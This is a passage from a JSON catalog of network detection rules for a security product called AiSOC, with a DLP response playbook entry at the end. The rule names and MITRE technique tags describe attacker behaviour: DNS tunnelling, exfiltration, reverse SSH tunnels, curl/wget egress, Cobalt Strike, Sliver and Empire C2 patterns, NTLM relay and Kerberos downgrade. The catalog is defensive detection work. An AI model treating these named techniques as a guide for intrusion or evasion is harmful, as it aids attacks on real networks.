Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "network", "mitre_techniques": [ "T1048.003" ], "log_source": "ndr", "playbook": "tpl-data-exfil", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/ftp-outbound-anomaly.yaml" }, { "id": "det-network-026", "type": "detection", "name": "Outbound Clear-Text Protocol Carrying Credentials", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'Outbound Clear-Text Protocol Carrying Credentials'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "network", "mitre_techniques": [ "T1040" ], "log_source": "ndr", "playbook": "tpl-account-compromise", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/outbound-clear-text-protocol.yaml" }, { "id": "det-network-027", "type": "detection", "name": "NTP Amplification Reflector Attack (Inbound monlist)", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'NTP Amplification Reflector Attack (Inbound monlist)'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1498.002" ], "log_source": "ndr", "playbook": "tpl-ddos", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/ntp-amplification.yaml" }, { "id": "det-network-028", "type": "detection", "name": "Peer-to-Peer Protocol on Corporate Network", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'Peer-to-Peer Protocol on Corporate Network'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "low", "category": "network", "mitre_techniques": [ "T1071" ], "log_source": "ndr", "playbook": "tpl-account-anomaly", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/p2p-protocol-on-corp-net.yaml" }, { "id": "det-network-029", "type": "detection", "name": "Kerberos Encryption Downgrade to RC4", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'Kerberos Encryption Downgrade to RC4'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "network", "mitre_techniques": [ "T1558.003" ], "log_source": "windows", "playbook": "tpl-credential-theft", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/kerberos-encryption-downgrade.yaml" }, { "id": "det-network-030", "type": "detection", "name": "WMI Remote Process Creation From Workstation", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'WMI Remote Process Creation From Workstation'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1047", "T1021.006" ], "log_source": "windows", "playbook": "tpl-lateral-movement", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/wmi-remote-execution.yaml" }, { "id": "det-network-031", "type": "detection", "name": "DNS Query For Newly Registered Domain (NRD)", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'DNS Query For Newly Registered Domain (NRD)'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "network", "mitre_techniques": [ "T1071.004" ], "log_source": "dns", "playbook": "tpl-command-and-control", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-dns-newly-registered-domain.yaml" }, { "id": "det-network-032", "type": "detection", "name": "DNS Query For Homoglyph Of Internal Brand", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'DNS Query For Homoglyph Of Internal Brand'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1583.001" ], "log_source": "dns", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-dns-idn-homoglyph.yaml" }, { "id": "det-network-033", "type": "detection", "name": "High Volume Of NXDOMAIN Responses From Single Host", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'High Volume Of NXDOMAIN Responses From Single Host'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "network", "mitre_techniques": [ "T1568.002" ], "log_source": "dns", "playbook": "tpl-command-and-control", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-dns-nxdomain-spike.yaml" }, { "id": "det-network-034", "type": "detection", "name": "DNS Query Type ANY Volume From Single Host", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'DNS Query Type ANY Volume From Single Host'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "network", "mitre_techniques": [ "T1018" ], "log_source": "dns", "playbook": "tpl-discovery", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-dns-any-query-spike.yaml" }, { "id": "det-network-035", "type": "detection", "name": "DNS Query With High-Entropy Subdomain (DGA Indicator)", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'DNS Query With High-Entropy Subdomain (DGA Indicator)'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1568.002" ], "log_source": "dns", "playbook": "tpl-command-and-control", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-dns-dga-shannon.yaml" }, { "id": "det-network-036", "type": "detection", "name": "Large DNS TXT Response (Possible C2)", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'Large DNS TXT Response (Possible C2)'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1071.004" ], "log_source": "dns", "playbook": "tpl-command-and-control", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-dns-large-txt-response.yaml" }, { "id": "det-network-037", "type": "detection", "name": "DNS Tunnel Indicator: Long Hex Subdomain Sequence", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'DNS Tunnel Indicator: Long Hex Subdomain Sequence'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1071.004" ], "log_source": "dns", "playbook": "tpl-command-and-control", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-dns-tunnel-pattern-len.yaml" }, { "id": "det-network-038", "type": "detection", "name": "DNS-Over-HTTPS Egress To Non-Sanctioned Resolver", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'DNS-Over-HTTPS Egress To Non-Sanctioned Resolver'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1572" ], "log_source": "proxy", "playbook": "tpl-command-and-control", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-dns-doh-non-resolver.yaml" }, { "id": "det-network-039", "type": "detection", "name": "DNS-Over-TLS Egress To Public IP", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'DNS-Over-TLS Egress To Public IP'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "network", "mitre_techniques": [ "T1572" ], "log_source": "proxy", "playbook": "tpl-command-and-control", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-dns-dot-non-resolver.yaml" }, { "id": "det-network-040", "type": "detection", "name": "DNS Query For .onion Address", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'DNS Query For .onion Address'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "network", "mitre_techniques": [ "T1090.003" ], "log_source": "dns", "playbook": "tpl-command-and-control", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-dns-tor-onion.yaml" }, { "id": "det-network-041", "type": "detection", "name": "DNS Fast-Flux Pattern (Many A Records, Short TTL)", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'DNS Fast-Flux Pattern (Many A Records, Short TTL)'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "network", "mitre_techniques": [ "T1568.001" ], "log_source": "dns", "playbook": "tpl-command-and-control", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-dns-fast-flux.yaml" }, { "id": "det-network-042", "type": "detection", "name": "DNS Rebinding Indicator (Public\u2192RFC1918 In Same TTL Window)", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'DNS Rebinding Indicator (Public\u2192RFC1918 In Same TTL Window)'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1090" ], "log_source": "dns", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-dns-rebinding.yaml" }, { "id": "det-network-043", "type": "detection", "name": "HTTP CONNECT Method Toward Public IP", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'HTTP CONNECT Method Toward Public IP'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1090" ], "log_source": "proxy", "playbook": "tpl-command-and-control", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-http-connect-public-ip.yaml" }, { "id": "det-network-044", "type": "detection", "name": "HTTP User-Agent Matches PowerShell Default", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'HTTP User-Agent Matches PowerShell Default'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1071.001" ], "log_source": "proxy", "playbook": "tpl-command-and-control", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-http-userag-powershell.yaml" }, { "id": "det-network-045", "type": "detection", "name": "curl/wget User-Agent From Workstation Subnet", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'curl/wget User-Agent From Workstation Subnet'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "network", "mitre_techniques": [ "T1071.001" ], "log_source": "proxy", "playbook": "tpl-command-and-control", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-http-userag-curl-internal.yaml" }, { "id": "det-network-046", "type": "detection", "name": "HTTP Host Header Is IP Literal", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'HTTP Host Header Is IP Literal'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "network", "mitre_techniques": [ "T1071.001" ], "log_source": "proxy", "playbook": "tpl-command-and-control", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-http-host-header-ip.yaml" }, { "id": "det-network-047", "type": "detection", "name": "TLS Client Offered TLS 1.0 Or 1.1", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'TLS Client Offered TLS 1.0 Or 1.1'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "network", "mitre_techniques": [ "T1573.002" ], "log_source": "proxy", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-tls-old-client-version.yaml" }, { "id": "det-network-048", "type": "detection", "name": "HTTPS Connection To IP Without SNI", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'HTTPS Connection To IP Without SNI'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "network", "mitre_techniques": [ "T1573.002" ], "log_source": "proxy", "playbook": "tpl-command-and-control", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-tls-no-sni.yaml" }, { "id": "det-network-049", "type": "detection", "name": "Self-Signed Certificate Presented On Public IP", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'Self-Signed Certificate Presented On Public IP'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1573.002" ], "log_source": "proxy", "playbook": "tpl-command-and-control", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-tls-self-signed-egress.yaml" }, { "id": "det-network-050", "type": "detection", "name": "TLS Negotiated Weak Cipher Suite", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'TLS Negotiated Weak Cipher Suite'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "network", "mitre_techniques": [ "T1600.001" ], "log_source": "proxy", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-tls-suspicious-cipher.yaml" }, { "id": "det-network-051", "type": "detection", "name": "JARM Fingerprint Matches Known Cobalt Strike Profile", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'JARM Fingerprint Matches Known Cobalt Strike Profile'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "network", "mitre_techniques": [ "T1573.002" ], "log_source": "proxy", "playbook": "tpl-command-and-control", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-jarm-cobalt-strike.yaml" }, { "id": "det-network-052", "type": "detection", "name": "JARM Fingerprint Matches Known Sliver Profile", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'JARM Fingerprint Matches Known Sliver Profile'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "network", "mitre_techniques": [ "T1573.002" ], "log_source": "proxy", "playbook": "tpl-command-and-control", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-jarm-sliver.yaml" }, { "id": "det-network-053", "type": "detection", "name": "HTTP Response MIME And Content-Encoding Mismatch", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'HTTP Response MIME And Content-Encoding Mismatch'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "network", "mitre_techniques": [ "T1027" ], "log_source": "proxy", "playbook": "tpl-command-and-control", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-http-gzip-mime-mismatch.yaml" }, { "id": "det-network-054", "type": "detection", "name": "Large HTTP POST From Workstation To Public IP", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'Large HTTP POST From Workstation To Public IP'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "network", "mitre_techniques": [ "T1041" ], "log_source": "proxy", "playbook": "tpl-exfiltration", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-http-large-post-from-workstation.yaml" }, { "id": "det-network-055", "type": "detection", "name": "Outbound SSH With -R Reverse-Tunnel Flag", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'Outbound SSH With -R Reverse-Tunnel Flag'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1572" ], "log_source": "proxy", "playbook": "tpl-command-and-control", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-ssh-reverse-tunnel.yaml" }, { "id": "det-network-056", "type": "detection", "name": "Tor Connection From Corporate Workstation", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'Tor Connection From Corporate Workstation'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1090.003" ], "log_source": "proxy", "playbook": "tpl-command-and-control", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-tor-egress-corp.yaml" }, { "id": "det-network-057", "type": "detection", "name": "ICMP Echo With Unusually Large Payload", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'ICMP Echo With Unusually Large Payload'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "network", "mitre_techniques": [ "T1095" ], "log_source": "proxy", "playbook": "tpl-command-and-control", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-icmp-large-payload.yaml" }, { "id": "det-network-058", "type": "detection", "name": "GRE Tunnel Initiated By Non-Network Host", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'GRE Tunnel Initiated By Non-Network Host'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "network", "mitre_techniques": [ "T1572" ], "log_source": "proxy", "playbook": "tpl-command-and-control", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-gre-from-non-network-device.yaml" }, { "id": "det-network-059", "type": "detection", "name": "WireGuard Handshake From User Workstation", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'WireGuard Handshake From User Workstation'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "network", "mitre_techniques": [ "T1572" ], "log_source": "proxy", "playbook": "tpl-command-and-control", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-wireguard-handshake-from-user.yaml" }, { "id": "det-network-060", "type": "detection", "name": "Corporate VPN Login Originating From Datacenter ASN", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'Corporate VPN Login Originating From Datacenter ASN'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "network", "mitre_techniques": [ "T1078.004" ], "log_source": "vpn", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-vpn-from-datacenter.yaml" }, { "id": "det-network-061", "type": "detection", "name": "Tor Introduction To Hidden Service From Corp Host", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'Tor Introduction To Hidden Service From Corp Host'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "network", "mitre_techniques": [ "T1090.003" ], "log_source": "proxy", "playbook": "tpl-command-and-control", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-tor-introduction-onion.yaml" }, { "id": "det-network-062", "type": "detection", "name": "Cloudflared Tunnel Started From Workstation", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'Cloudflared Tunnel Started From Workstation'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "network", "mitre_techniques": [ "T1572" ], "log_source": "proxy", "playbook": "tpl-command-and-control", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-cloudflared-tunnel-egress.yaml" }, { "id": "det-network-063", "type": "detection", "name": "SMB Version 1 Negotiated In Network Flow", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'SMB Version 1 Negotiated In Network Flow'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1021.002" ], "log_source": "firewall", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-smbv1-egress.yaml" }, { "id": "det-network-064", "type": "detection", "name": "SMB Write To NETLOGON Share", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'SMB Write To NETLOGON Share'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "network", "mitre_techniques": [ "T1570" ], "log_source": "firewall", "playbook": "tpl-lateral-movement", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-smb-write-netlogon.yaml" }, { "id": "det-network-065", "type": "detection", "name": "SMB Write To SYSVOL Share From Non-DC", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'SMB Write To SYSVOL Share From Non-DC'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1570" ], "log_source": "firewall", "playbook": "tpl-lateral-movement", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-smb-write-sysvol.yaml" }, { "id": "det-network-066", "type": "detection", "name": "NTLM Relay Indicator (Same Challenge Reused Across Hosts)", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'NTLM Relay Indicator (Same Challenge Reused Across Hosts)'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "network", "mitre_techniques": [ "T1557.001" ], "log_source": "firewall", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-ntlm-relay-pattern.yaml" }, { "id": "det-network-067", "type": "detection", "name": "RPC Remote Registry Write From Workstation Subnet", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'RPC Remote Registry Write From Workstation Subnet'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1112" ], "log_source": "firewall", "playbook": "tpl-lateral-movement", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-rpc-remote-registry.yaml" }, { "id": "det-network-068", "type": "detection", "name": "RPC Task Scheduler Create From Workstation", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'RPC Task Scheduler Create From Workstation'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1053.005" ], "log_source": "firewall", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-rpc-task-scheduler-remote.yaml" }, { "id": "det-network-069", "type": "detection", "name": "WinRM HTTPS From Workstation To DC", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'WinRM HTTPS From Workstation To DC'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1021.006" ], "log_source": "firewall", "playbook": "tpl-lateral-movement", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-winrm-ssl-from-workstation.yaml" }, { "id": "det-network-070", "type": "detection", "name": "Cobalt Strike Default Named Pipe Pattern", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'Cobalt Strike Default Named Pipe Pattern'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "network", "mitre_techniques": [ "T1573.002" ], "log_source": "firewall", "playbook": "tpl-command-and-control", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-cobalt-strike-named-pipe.yaml" }, { "id": "det-network-071", "type": "detection", "name": "Sliver Default Named Pipe Pattern", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'Sliver Default Named Pipe Pattern'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "network", "mitre_techniques": [ "T1573" ], "log_source": "firewall", "playbook": "tpl-command-and-control", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-sliver-named-pipe.yaml" }, { "id": "det-network-072", "type": "detection", "name": "Empire C2 Default URI Pattern Observed", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'Empire C2 Default URI Pattern Observed'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "network", "mitre_techniques": [ "T1071.001" ], "log_source": "proxy", "playbook": "tpl-command-and-control", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-empire-default-uri.yaml" }, { "id": "det-network-073", "type": "detection", "name": "Kerberos Service Ticket Issued With RC4 Encryption", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'Kerberos Service Ticket Issued With RC4 Encryption'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1558.003" ], "log_source": "windows", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-kerberos-rc4-ticket.yaml" }, { "id": "det-network-074", "type": "detection", "name": "Kerberos Account With Pre-Auth Disabled Used", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'Kerberos Account With Pre-Auth Disabled Used'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1558.004" ], "log_source": "windows", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-kerberos-pre-auth-disabled.yaml" }, { "id": "det-network-075", "type": "detection", "name": "RADIUS Authentication Used PAP (Cleartext Password)", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'RADIUS Authentication Used PAP (Cleartext Password)'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1110" ], "log_source": "radius", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-radius-pap-clear.yaml" }, { "id": "det-network-076", "type": "detection", "name": "LDAP Signing Disabled On Domain Controller", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'LDAP Signing Disabled On Domain Controller'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1557.001" ], "log_source": "windows", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-ldap-signing-disabled.yaml" }, { "id": "det-network-077", "type": "detection", "name": "LDAP Search Pattern Matches BloodHound Collection", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'LDAP Search Pattern Matches BloodHound Collection'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1087.002" ], "log_source": "windows", "playbook": "tpl-discovery", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-ldap-bloodhound-pattern.yaml" }, { "id": "det-network-078", "type": "detection", "name": "ICMP Echo With High-Entropy Payload", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'ICMP Echo With High-Entropy Payload'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1095" ], "log_source": "firewall", "playbook": "tpl-exfiltration", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-icmp-high-entropy-payload.yaml" }, { "id": "det-network-079", "type": "detection", "name": "DHCP Starvation: Rapid Lease Churn From Single MAC Range", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'DHCP Starvation: Rapid Lease Churn From Single MAC Range'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1498" ], "log_source": "firewall", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-dhcp-starvation.yaml" }, { "id": "det-network-080", "type": "detection", "name": "STP Topology Change Advertised By Edge Port", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'STP Topology Change Advertised By Edge Port'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "network", "mitre_techniques": [ "T1498" ], "log_source": "switch", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-stp-topology-change-from-edge.yaml" }, { "id": "dlp-violation-response-v1", "type": "detection", "name": "DLP Policy Violation Response", "description": "Responds to data loss prevention (DLP) policy violations including unauthorized data transfers, sensitive document uploads to personal storage, or PII/PHI exfiltration attempts. Blocks the transfer, notifies compliance, and preserves audit evidence.", "version": "1.0.0", "author": "Beenu - beenu@cyble.com", "tags": [ "dlp", "data-loss-prevention", "compliance", "pii", "phi", "exfiltration" ], "severity": null, "category": "playbooks", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/playbooks/dlp-violation-response.yaml" }, { "id": 